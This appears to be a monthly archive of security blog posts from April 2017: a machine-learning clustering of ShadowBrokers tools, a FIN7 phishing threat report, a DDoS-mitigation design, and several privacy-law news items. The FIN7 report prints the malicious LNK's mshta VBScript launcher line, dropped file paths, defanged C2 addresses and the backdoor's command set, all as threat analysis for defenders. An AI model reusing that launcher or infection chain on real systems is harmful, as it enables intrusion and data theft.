Monthly Archives: April 2017

ShadowBrokers Leak: A Machine Learning Approach

During the past few weeks I read a lot of great papers, blog posts and full magazine articles on the ShadowBrokers leak (free public repositories: here and here). Many of them described the amazing power of these tools (which, by the way, are currently being used by attackers to exploit systems missing the MS17-010 patch), others took us through great reverse engineering adventures on some of the most used payloads, and others again described what is likely to happen in the near future.

So you are probably wondering why I am writing about this much-discussed topic again. Well, I did not find anyone who decided to extract features from such tools in order to correlate them with notorious payloads and malware. Following my previous blog post, Malware Training Sets: A machine learning dataset for everyone, I decided to "refill" my public GitHub repository with more analyses on that topic.

If you are not familiar with this leak, you probably want to know that the Equation Group (attributed to the NSA) built FuzzBunch, an exploitation framework similar to Metasploit. The framework uses several remote exploits for Windows such as EternalBlue, EternalRomance, EternalSynergy, etc., which in turn load external payloads; one of the most famous, as of today, is DoublePulsar, mainly used in SMB and RDP exploits. The system works in a straightforward way, performing the following steps:

  • STEP 1: EternalBlue is launched from the platform with a configuration file (XML in the image) and the target IP.

Eternalblue working

  • STEP 2: DoublePulsar and additional payloads. Once EternalBlue has successfully exploited Windows (in my case it was Windows 7 SP1), it installs DoublePulsar, which can be used much as a professional pentester would use Meterpreter/Empire/Beacon backdoors.

DoublePulsar usage
  • STEP 3: DanderSpritz. A command and control manager to manage multiple implants. It can act as a C&C listener or be used to connect directly to targets as well.

DanderSpritz


Following the same process described here (and shown in the following image), I generated a features file for each of the aforementioned Equation Group tools. The process involved detonating the files in multiple sandboxes, performing both dynamic and static analysis. The analysis results are translated into MIST format and then saved as JSON files for convenience.


In order to compare the previously generated results (i.e., the notorious malware available here) with this latest leak, and to figure out whether Equation Group can also be credited with building known malware included in the repository, you might decide to use one of the several machine learning frameworks available out there. WEKA (developed by the University of Waikato) is a classic data mining tool which implements several algorithms and compares them in order to find the best fit for the data set. Since I am looking for the "best" algorithm before applying production machine learning to such a dataset, I decided to go with WEKA: it implements several algorithms "ready to go" and performs automatic performance analysis in order to figure out which algorithm is best in my case. However, WEKA needs a specific input format called ARFF (described here), while I have a JSON representation of the MIST files. I tried several times to import my MIST JSON files into WEKA, but with no luck. So I decided to write a quick and dirty conversion tool, really *not performant* and really *not usable in a production environment*, which converts the (JSONized) MIST format into ARFF. The following script does the job, assuming the JSONized MIST content has been loaded into a MongoDB server. NOTE: the script is ugly and written just to make it work; there are no input checks, no variable checks, and a very naive and trivial O(m*n^2) loop.

From MIST to ARFF
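As a textual companion to the screenshot above, here is a minimal sketch of the same idea, a hedged approximation rather than the exact code from the repository. It assumes the JSONized MIST reports sit in a local MongoDB database named "malware", collection "mist", with each document shaped like {"label": "<family>", "features": ["<mist token>", ...]}; those names are my assumptions, not the actual schema.

# Minimal sketch: convert JSONized MIST reports stored in MongoDB into an ARFF file.
# Database, collection and field names are assumptions, not the repository's schema.
from pymongo import MongoClient

client = MongoClient("mongodb://localhost:27017/")
docs = list(client["malware"]["mist"].find({}, {"label": 1, "features": 1}))

# Build the global attribute vocabulary (the naive, memory-hungry part).
vocabulary = sorted({token for doc in docs for token in doc.get("features", [])})
labels = sorted({doc["label"] for doc in docs})

with open("MK.arff", "w") as arff:
    arff.write("@RELATION mist\n\n")
    for token in vocabulary:
        arff.write('@ATTRIBUTE "%s" NUMERIC\n' % token.replace('"', "'"))
    arff.write("@ATTRIBUTE class {%s}\n\n" % ",".join(labels))
    arff.write("@DATA\n")
    for doc in docs:                       # O(m*n) over samples and vocabulary
        present = set(doc.get("features", []))
        row = ["1" if token in present else "0" for token in vocabulary]
        arff.write(",".join(row) + "," + doc["label"] + "\n")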

The resulting file MK.arff is 1.2 GB of pure text, ready to be analyzed with WEKA or any other machine learning tool that understands the standard ARFF file format. The script is available here. I am not going to comment on or describe the result sets, since I do not want to reach "dangerous governmental conclusions" in my public blog. If you have read this post up to here, you have the whole process, the right data and the desired tools to perform the analyses on your own. What follows are some short, inconclusive results with no associated comments.

TEST 1:
Algorithm: Simple K-Means
Number of clusters: 95 (We know it, since the data is classified)
Seed: 18 (just random choice)
Distance Function: EuclideanDistance, Normalized and Not inverted.

RESULTS (sum of squared errors: 5.00):

K-Means Results
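For readers who prefer scripting over the WEKA GUI, here is a hedged sketch of a roughly comparable run using scikit-learn's KMeans instead of WEKA's SimpleKMeans. It assumes the MK.arff described above (numeric 0/1 attributes plus a final nominal class attribute) and is not the exact configuration behind the screenshot, so expect different numbers.

# Rough, assumed equivalent of the WEKA SimpleKMeans run: k=95, fixed seed,
# Euclidean distance. Loading a 1.2 GB ARFF this way is slow; it is only a sketch.
import numpy as np
from scipy.io import arff
from sklearn.cluster import KMeans

data, meta = arff.loadarff("MK.arff")
feature_names = [name for name in meta.names() if name != "class"]
X = np.array([[row[name] for name in feature_names] for row in data], dtype=float)

model = KMeans(n_clusters=95, random_state=18, n_init=10).fit(X)
print("within-cluster sum of squared errors:", model.inertia_)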

TEST 2:
Algorithm: Expectation Maximisation
Number of clusters: to be discovered
Seed: 0

RESULTS (few significant clusters detected):

Extracted Classes

TEST 3:
Algorithm: CobWeb
Number of clusters: to be discovered
Seed: 42

RESULTS (again, few significant clusters were found):

Few descriptive clusters

As of today many analysts have done a great job studying the ShadowBrokers leak, but few of them (actually none so far, at least to my knowledge) have tried to cluster the result sets derived from dynamic execution of the leaked tools. In this post I followed my previous path, enlarging my public dataset and offering security researchers the data, procedures and tools to run their own analyses.

German Federal Parliament Passes New German Data Protection Act

This post has been updated. 

On April 27, 2017, the German Federal Parliament adopted the new German Federal Data Protection Act (Bundesdatenschutzgesetz) (“new BDSG”) to replace the existing Federal Data Protection Act of 2003. The new BDSG is intended to adapt the current German data protection law to the EU General Data Protection Regulation (“GDPR”), which will become effective on May 25, 2018.

The new BDSG includes specific requirements that deviate from the GDPR in some respects, including with respect to the appointment of a Data Protection Officer and the processing of employee personal data. The GDPR allows for certain EU Member State deviations from the text of the GDPR. In addition, the new BDSG imposes specific data processing requirements with respect to video surveillance, and consumer credit, scoring and creditworthiness. In addition to the high fines imposed by the GDPR, the new BDSG imposes fines of up to EUR 50,000 for violations of requirements that exist exclusively under German law.

The new BDSG must now be approved by the German Federal Council, which is expected to occur in the next couple of weeks, possibly during the May 12, 2017 plenary meeting. Once adopted, the new BDSG will become effective on May 25, 2018, at the same time as the GDPR.

Read the new German Federal Data Protection Act (only available in German).

Update: On May 12, 2017, the German Federal Council approved the new BDSG, which will become effective on May 25, 2018, at the same time as the GDPR.

Update: On July 5, 2017, the new BDSG was published in the Federal Law Gazette.

Hack Naked News #121 – April 27, 2017

Windows boxes are getting pwned, vulnerabilities in SugarCRM, Ashley Madison is back in the news, and more. Jason Wood of Paladin Security joins us to deliver expert commentary on hacking cars with radio gadgets on this episode of Hack Naked News!

Full Show Notes: http://wiki.securityweekly.com/wiki/index.php/HNNEpisode121 Visit http://www.securityweekly.com for all the latest episodes!

Book Review: Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems

The overall equation is pretty simple: If you want to understand network traffic, you really should install Wireshark. And, if you really want to use Wireshark effectively, you should consider this book. Already in its third edition, Practical Packet Analysis both explains how Wireshark works and provides expert guidance on how you can use the tool to solve real-world network problems.

Yes, there are other packet analyzers, but Wireshark is one of the best, works on Windows, Mac, and Linux, and is free and open source. And, yes, there are other books, but this one focuses both on understanding the tool and using it to address the kind of problems that you're likely to encounter.


New York Publishes FAQs and Key Dates for Cybersecurity Regulation

Earlier this month, the New York State Department of Financial Services (“NYDFS”) published FAQs and key dates for its cybersecurity regulation (the “NYDFS Regulation”) for financial institutions, which became effective on March 1, 2017.

The FAQs address topics including:

  • whether a covered entity is required to give notice to consumers affected by a cybersecurity event;
  • whether a covered entity may adopt portions of an affiliate’s cybersecurity program without adopting all of it;
  • whether DFS-authorized New York branches, agencies and representative offices of out-of-country foreign banks are required to comply with the NYDFS Regulation;
  • what constitutes “continuous monitoring” for purposes of the NYDFS Regulation;
  • how a covered entity should submit Notices of Exemption, Certifications of Compliance and Notices of Cybersecurity Events; and
  • whether an entity can be both a covered entity and a third-party service provider under the NYDFS Regulation.

The NYDFS also listed key dates for the NYDFS Regulation, which include:

  • March 1, 2017 – the NYDFS Regulation becomes effective.
  • August 28, 2017 – the 180-day transitional period ends and covered entities are required to be in compliance with requirements of the NYDFS Regulation unless otherwise specified.
  • September 27, 2017 – the initial 30-day period for filing Notices of Exemption ends.
  • February 15, 2018 – covered entities are required to submit the first certification under the NYDFS Regulation on or prior to this date.
  • March 1, 2018 – the one year transitional period ends. Covered entities are required to comply with certain requirements such as those related to penetration testing, vulnerability assessments, risk assessment and cybersecurity training.
  • September 3, 2018 – the eighteen month transitional period ends. Covered entities are required to comply with audit trail, data retention and encryption requirements.
  • March 1, 2019 – the two year transitional period ends. Covered entities are required to develop a third-party service provider compliance program.

In a recent conference of the National Association of Insurance Commissioners, Maria Vullo, the NYDFS superintendent, stated that “The New York regulation is a road map with rules of the road.”

FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:

\Users\[user_name]\Intel\58d2a83f7778d5.36783181.vbs
\Users\[user_name]\Intel\58d2a83f777942.26535794.ps1
\Users\[user_name]\Intel\58d2a83f777908.23270411.vbs

Also, the script creates a named scheduled task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes.
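As a defender-side illustration (my own addition, not part of the original write-up), the persistence pattern described above can be hunted for by listing scheduled tasks and flagging any whose action points to a .vbs under a user's Intel folder. The sketch below assumes an English-language Windows installation, since the schtasks CSV column names are locale dependent.

# Hedged triage sketch: flag scheduled tasks whose action runs a .vbs from an
# "\Intel\" path, matching the persistence described above. Column names such as
# "Task To Run" assume an English-language Windows installation.
import csv
import subprocess

output = subprocess.run(
    ["schtasks", "/query", "/fo", "CSV", "/v"],
    capture_output=True, text=True, check=True,
).stdout

for row in csv.DictReader(output.splitlines()):
    action = (row.get("Task To Run") or "").lower()
    if action.endswith(".vbs") and "\\intel\\" in action:
        print("suspicious task:", row.get("TaskName"), "->", action)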

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:

aaa.stage.14919005.www1.proslr3[.]com

Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:

 [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com
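As a small, illustrative addition of my own (not from the report), the retry pattern above can be matched with a simple regular expression when reviewing DNS or proxy logs:

# Illustrative only: match the C2 retry hostname pattern described above, i.e.
# three lowercase letters prepended to stage.14919005.www1.proslr3.com.
import re

C2_PATTERN = re.compile(r"^[a-z]{3}\.stage\.14919005\.www1\.proslr3\.com$")

for hostname in ("aaa.stage.14919005.www1.proslr3.com",
                 "xyz.stage.14919005.www1.proslr3.com",
                 "www.example.com"):
    if C2_PATTERN.match(hostname):
        print("possible FIN7 C2 lookup:", hostname)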

VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:

\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777638.60220156.ini
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777688.78384945.ps1
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776b5.64953395.txt
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f7776e0.72726761.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777716.48248237.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\58d2a83f777788.86541308.vbs
\Intel\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\Foxconn.lnk

This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:

hxxp://198[.]100.119.6:80/cd
hxxp://198[.]100.119.6:443/cd
hxxp://198[.]100.119.6:8080/cd

This version of HALFBAKED listens for the following commands from the C2 server:

  • info: Sends victim machine information (OS, processor, BIOS and running processes) using WMI queries
  • processList: Sends a list of running processes
  • screenshot: Takes a screenshot of the victim machine (using 58d2a83f777688.78384945.ps1)
  • runvbs: Executes a VBScript
  • runexe: Executes an EXE file
  • runps1: Executes a PowerShell script
  • delete: Deletes the specified file
  • update: Updates the specified file

All communication between the backdoor and the attacker's C2 is encoded using the following technique, represented in pseudo code:

Function send_data(data)
    random_string = custom_function_to_generate_random_string()
    encoded_data = URLEncode(SimpleEncrypt(data))
    post_data("POST", random_string & "=" & encoded_data, Hard_coded_c2_url, Create_Random_Url(class_id))
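To make the pseudo code a bit more concrete, here is a hedged Python rendering of the same structure. SimpleEncrypt and the randomized URL generation are not specified in the post, so the placeholders below only mirror the shape of the traffic, not the actual encoding.

# Structural sketch only: simple_encrypt() is a placeholder, NOT the real cipher,
# and the C2 URL handling is omitted. It mirrors the "<random>=<encoded data>"
# POST body pattern shown in the pseudo code above.
import random
import string
import urllib.parse

def random_string(length: int = 8) -> str:
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))

def simple_encrypt(data: bytes) -> bytes:
    return bytes(b ^ 0x5A for b in data)  # placeholder transformation

def build_post_body(data: bytes) -> str:
    # The backdoor POSTs this body to its hard-coded C2 URL under a randomized path.
    return random_string() + "=" + urllib.parse.quote_plus(simple_encrypt(data))

print(build_post_body(b"example victim info"))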

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

  • Version: 0
  • NetBIOS name: andy-pc
  • Droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • Birth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca
  • Birth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268
  • MAC address: 08:00:27:3d:52:68
  • UUID timestamp: 03/21/2017 (12:12:28.500) [UTC]
  • UUID sequence number: 2861

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.
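The VirtualBox inference comes from the MAC address: 08:00:27 is the OUI used by VirtualBox virtual network adapters. A tiny helper of my own for bulk-checking already-extracted LNK metadata might look like this (the input field names are my convention, not lnk-parser's output format):

# Hedged helper: flag extracted LNK metadata whose MAC address carries the
# VirtualBox OUI (08:00:27). Field names are my own convention.
VIRTUALBOX_OUI = "08:00:27"

def generated_on_virtualbox(lnk_metadata: dict) -> bool:
    mac = lnk_metadata.get("mac_address", "").lower()
    return mac.startswith(VIRTUALBOX_OUI)

record = {"netbios_name": "andy-pc", "mac_address": "08:00:27:3d:52:68"}
if generated_on_virtualbox(record):
    print(record["netbios_name"], "was likely a VirtualBox guest")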

Example Phishing Lures

  • Filename: Doc33.docx
  • MD5: 6a5a42ed234910121dbb7d1994ab5a5e
  • Filename: Mail.rtf
  • MD5: 1a9e113b2f3caa7a141a94c8bc187ea7

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

Mitigating application layer (HTTP(S)) DDOS attacks

DDOS attacks seem to be the new norm on the Internet. Years ago only big websites and web applications got attacked, but nowadays rather small and medium companies or institutions get attacked as well. This makes it necessary for administrators of smaller sites to plan for the time they get attacked. This blog post shows you what you can do yourself and for what you need external help. As you'll see later, you most likely can only mitigate DDOS attacks against the application layer by yourself and will need help for all other attacks. One important part of a successful defense against a DDOS attack, which I won't explain here in detail, is a good media strategy: if you can convince the media that the attack is no big deal, they may not report sensationally about it and make the attack appear bigger and more problematic than it was. A classic example is a DDOS against a website that only shows information and has no impact on day-to-day operations. But there are better blogs for this non-technical topic, so let's get into the technical part.

different DDOS attacks

From the point of view of an administrator of a small website or web application, there are basically two types of attacks:

  • An attack that saturates your Internet connection or your provider's Internet connection (bandwidth and traffic attack).
  • Attacks against your website or web application itself (application layer attack).

saturation attacks

Let's take a closer look at the first type of attack. There are many different variations of these connection saturation attacks, but the distinction does not matter much for the SME administrator: you can't do anything against them by yourself. Why? You can't do anything on your server because the good traffic can't reach it; your Internet connection, or a connection/router of your Internet Service Provider (ISP), is already saturated with attack traffic. The mitigation needs to take place on a system upstream of the part that is saturated. There are different methods to mitigate such attacks.

Depending on the type of website it is possible to use a Content Delivery Network (CDN). A CDN basically caches the data of your website in multiple geographically distributed locations. This way each location gets attacked by only a part of the attacking systems. This is a nice way to also guard against many application layer attacks, but it does not work (or not easily) if the content of your site is not the same for every client/user. E.g., an information website with some downloads and videos is easily changed to use a CDN, but an application like a webmail system or an accounting system will be hard to adapt and will not gain 100% protection even then. Another problem with CDNs is that you must protect each website separately. That's fine if you have only one big website that is the core of your business, but it becomes a problem if the attacker can choose from multiple sites/applications. A classic example is a company that protects its homepage with a CDN, but the attacker finds, via Google, the webmail of the company's Exchange server. Instead of attacking the CDN, he attacks the Internet connection in front of the webmail. The problem will now most likely be that the site-to-site VPN connections to the company's remote offices are down and working with the central systems is no longer possible for the employees in the remote locations.

So let's assume for the rest of the document that using a CDN is not possible or not feasible. In that case you need to talk to your ISPs. The following are possible mitigations a provider can deploy for you:

  • Using a dedicated DDOS mitigation tool. These tools take all traffic and filter most of the bad traffic out. For this to work, the mitigation tool needs to know your normal traffic patterns, and the DDOS needs to be small enough that the provider's Internet connections are able to handle it. Some companies sell on-premise mitigation tools; don't buy them, it's wasted money, as they sit behind the very link that gets saturated.
  • If the DDOS attack is against an IP address which is not mission critical (e.g. the attack is against the website, but the web application is the critical system), let the provider block all traffic to that IP address. If the provider has an agreement with its upstream providers, it is even possible to filter that traffic before it reaches the provider, so this also works if the ISP's Internet connection cannot handle the attack.
  • If you have your own IP space, it is possible for your provider(s) to stop announcing your IP addresses/subnet to every router in the world and, e.g., only announce it to local providers. This helps to reduce the traffic to an amount which can be handled by a mitigation tool or by your Internet connection. This is an especially good mitigation method if your main audience is local, e.g. 90% of your customers/clients are from the same region or country as you are; during an attack you don't care about IP addresses from some far-away country.
  • A special variant of the last point is to connect to a local Internet exchange, which may also help to reduce your Internet costs and in any case raises your resilience against DDOS attacks.

This covers the basics and allows you to understand and talk with your providers at eye level. There is also a subset of saturation attacks which does not saturate the connection but the server or firewall (e.g. SYN floods), but as most small and medium companies have at most a one Gbit/s Internet connection, it is unlikely that a decent server (and its operating system) or firewall is the limiting factor; most likely it's the application on top of it.

application layer attacks

Which is a perfect transition to this chapter about application layer DDOS. Let's start with an example to describe this kind of attack. Some years ago a common attack was to use the pingback feature of WordPress installations to flood a given URL with requests. I've seen such an attack hammering a special URL on a target system that did something CPU and memory intensive, which led to a successful DDOS against the application with less than 10 Mbit/s of traffic. All requests were valid requests, and as the URL was an HTTPS one (which is more likely than not today), a mitigation in the network was not possible. The solution was quite easy in this case, as the HTTP User-Agent was WordPress, which was easy to filter on the web server and had no side effects.

But this was a specific mitigation which would be easy to bypass if the attacker noticed it and changed the requests his botnet sends. Which leads to the main problem with this kind of attack: you need to be able to block the bad traffic while letting the good traffic through. Persistent attackers commonly change the attack mode; an attack runs with method 1 until you're able to filter it out, then the attacker switches to the next method. This can go on for days. To make it harder for an attacker, it is a good idea to implement some kind of human-vs-bot detection method.

I’m human

The “I’m human” button from Google is quite well known; the technique behind it is that it rates the connection (source IP address, cookies from login sessions to Google, etc.) and with that information decides whether the request comes from a human. If the system is sure the request is from a human, you won't see anything. If it is slightly unsure, a simple green check-mark will be shown; if it is more unsure or thinks the request comes from a bot, it will show a CAPTCHA. So the question is: can we implement something similar ourselves? Sure we can, let's dive into it.

peace time

During peace time, set a special DDOS cookie whenever a user authenticates correctly. I'll describe the data in the cookie in detail later.

war time

So let's say we detected an attack, manually or automatically, by checking the number of requests, e.g. against the login page. In that case the bot/human detection gets activated. Now the web server checks each request for the presence of the DDOS cookie and whether the cookie can be decoded correctly. All requests which don't contain a valid DDOS cookie get temporarily redirected to a separate host, e.g. https://iamhuman.example.org, with the originally requested URL as the referrer. This host runs on a different server (so if it gets overloaded it does not affect the normal users). It shows a CAPTCHA, and if the user solves it correctly, the DDOS cookie will be set for example.org and a redirect to the original URL will be sent.

Info: If you have requests from trusted IP ranges, e.g. internal IP addresses or IP ranges of partner organizations, you can exclude them from the redirect to the CAPTCHA page.

sophistication ideas and cookie

An attacker could obtain a cookie and use it for his bots. To guard against this, write the client's IP address, encrypted, into the cookie. Also put the encrypted timestamp of the cookie's creation into it. Storing the username as well, if the cookie was created by the login process, is a good idea so you can check which user got compromised.

Encrypt the cookie with an authenticated encryption algorithm (e.g. AES-128-GCM) and put the following into it:

  • NONCE
  • typ
    • L for Login cookie
    • C for Captcha cookie
  • username
    • Only if login cookie
  • client IP address
  • timestamp

The key for the encryption/decryption of the cookie is static and does not leave the servers. The cookie should be set for the whole domain to be able to protect multiple websites/applications. Also make it HttpOnly to make stealing it harder.
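Here is a minimal sketch of such a cookie in Python, assuming the "cryptography" package and AES-128-GCM. The field list follows the bullets above; the pipe-separated encoding, the hex transport format and the function names are my own choices, not a production design.

# Minimal sketch of the DDOS cookie described above (AES-128-GCM, authenticated).
# Field layout follows the list above; encoding details are my own assumptions.
import os
import time
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

KEY = AESGCM.generate_key(bit_length=128)  # static key, never leaves the servers

def make_cookie(typ: str, client_ip: str, username: str = "") -> str:
    nonce = os.urandom(12)
    payload = "|".join([typ, username, client_ip, str(int(time.time()))]).encode()
    return (nonce + AESGCM(KEY).encrypt(nonce, payload, None)).hex()

def check_cookie(cookie: str, client_ip: str, max_age: int = 30 * 24 * 3600) -> bool:
    try:
        raw = bytes.fromhex(cookie)
        payload = AESGCM(KEY).decrypt(raw[:12], raw[12:], None).decode()
        typ, username, ip, timestamp = payload.split("|")
    except Exception:
        return False  # wrong key, tampered cookie or malformed value
    return ip == client_ip and time.time() - int(timestamp) < max_age

login_cookie = make_cookie("L", "203.0.113.7", "alice")
print(check_cookie(login_cookie, "203.0.113.7"))    # True
print(check_cookie(login_cookie, "198.51.100.99"))  # False: different client IP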

implementation

On the normal web server, which checks the cookie, the following implementations are possible:

  • The Apache web server provides the mod_session_* modules, which provide some of the needed functionality, but not all.
  • The Apache RewriteMap directive (https://httpd.apache.org/docs/2.4/rewrite/rewritemap.html) with a “prg: External Rewriting Program” should allow everything (see the sketch after this list). Performance may be an issue.
  • Your own Apache module
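To illustrate the RewriteMap idea, here is a hedged sketch of an external rewriting program; the httpd.conf wiring in the comments and the reuse of check_cookie() from the cookie sketch above are assumptions I have not battle-tested, so treat it as a starting point only.

#!/usr/bin/env python3
# Hedged sketch of an Apache RewriteMap "prg:" helper: Apache writes one lookup key
# per line to stdin and expects exactly one answer line on stdout. Assumed wiring:
#   RewriteMap ddoscheck "prg:/usr/local/bin/ddos_check.py"
#   RewriteCond ${ddoscheck:%{REMOTE_ADDR} %{HTTP:Cookie}} =redirect
#   RewriteRule .* https://iamhuman.example.org/ [R=302,L]
import sys

def check_cookie(cookie_header: str, client_ip: str) -> bool:
    # Extract the DDOS cookie from the Cookie header and validate it as in the
    # cookie sketch above; stubbed out here.
    return False

for line in sys.stdin:
    try:
        client_ip, cookie_header = line.rstrip("\n").split(" ", 1)
        answer = "ok" if check_cookie(cookie_header, client_ip) else "redirect"
    except ValueError:
        answer = "redirect"
    sys.stdout.write(answer + "\n")
    sys.stdout.flush()  # the prg: protocol requires unbuffered answers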

If you know about any other method, please write a comment!

The CAPTCHA issuing host is quite simple.

  • Use any minimalistic website with PHP/Java/Python to create the cookie
  • Create your own CAPTCHA or integrate a solution like reCAPTCHA

pro and cons

  • Pro
    • Users that authenticated within the last weeks won’t see the DDOS mitigation. Most likely these are your power users / biggest clients.
    • It’s possible to step up the protection gradually, e.g. the IP address binding is only needed when the attacker is using valid cookies.
    • The primary web server does not need any database or external system to check the cookie.
    • The most likely case during an attack is that the cookie is not set at all, which takes very few CPU resources to check.
    • Sending a 302 to the bot creates only a few bytes of traffic, and if the bot requests the redirect URL, that request hits the other server and creates no load on the server we want to protect.
    • No change to the applications is necessary.
    • The operations team does not need to be expert in mitigating attacks against the application layer; simply activating the protection is enough.
    • Traffic stays local and is not sent to an external provider (which may be a problem for a bank or under European data protection laws).
  • Cons
    • How to handle automatic requests (API)? Make exceptions for these or block them in case of an attack?
    • Problems with non-browser clients like ActiveSync clients.
    • Multiple domains need multiple cookies

All in all I see this as a good mitigation method for application layer attacks, and I hope the blog post helps you and your business. Please leave feedback in the comments. Thanks!

FTC Seeks Comment on Proposed Changes to TRUSTe’s COPPA Safe Harbor Program

On April 19, 2017, the FTC announced that it is seeking public comment on proposed changes to TRUSTe, Inc.’s safe harbor program under the Children’s Online Privacy Protection Rule (the “Proposed Changes”). As we previously reported, New York Attorney General Eric T. Schneiderman announced that TRUSTe agreed to settle allegations that it failed to properly verify that customer websites aimed at children did not run third-party software to track users. The Proposed Changes are a result of the settlement agreement between TRUSTe and the New York Attorney General.

Among other changes, the Proposed Changes would require participants in TRUSTe’s safe harbor program to conduct an annual internal assessment of third parties’ collection of personal information from children on their websites or online services. The FTC is seeking comment on the Proposed Changes, including any benefits, costs and alternatives that should be considered. The FTC also is seeking comment on the effectiveness of the mechanisms used to assess compliance with the Proposed Changes.

The Proposed Changes are open for public comment until May 24, 2017.

Mac attack

After years of enjoying relative security through obscurity, many attack vectors have recently proved successful on Apple Mac, opening the Mac up to future attack. A reflection of this is the final quarter of 2016, when Mac OS malware samples increased by 247% according to McAfee. Even though threats are still much lower than for …

Enterprise Security Weekly #41 – Solving Problems

Rami Essaid of Distil networks joins us for an interview. In the news, Cylance battles the malware testing industry, Tanium’s CEO issues an apology, Malwarebytes integrates with ForeScout, and more in this episode of Enterprise Security Weekly!Full show notes: http://wiki.securityweekly.com/wiki/index.php/ES_Episode41 Visit http://www.securityweekly.com for all the latest episodes!

German DPA Publishes English Translation of Standard Data Protection Model

On April 13, 2017, the North Rhine-Westphalia State Commissioner for Data Protection and Freedom of Information published an English translation of the draft Standard Data Protection Model (“SDM”). The SDM was adopted in November 2016 at the Conference of the Federal and State Data Protection Commissioners. 

German data protection authorities (“DPAs”) are currently reviewing the SDM, and the final version is expected to be published later this year. The English version of the SDM is a literal translation of the German text. An international version of the SDM currently is being prepared by the German DPAs.

The SDM contains a catalogue of data security measures and creates a methodology with respect to how the EU General Data Protection Regulation’s (“GDPR’s”) general security requirements should be implemented in practice. The SDM aims to harmonize how German DPAs review data security measures. The SDM also aims to assist companies in planning, implementing and reviewing their data security measures. The SDM structures the legal requirements in terms of data protection goals, such as data minimization, availability, integrity, confidentiality, transparency, “unlinkability” and “intervenability.”

In the current version, the SDM takes into account the GDPR wherever it contains references to German legal requirements, and is applicable until the GDPR takes effect in May 2018.

Read the SDM in English and German.

OCR Settlement Underscores Importance of Risk Analysis and Risk Management

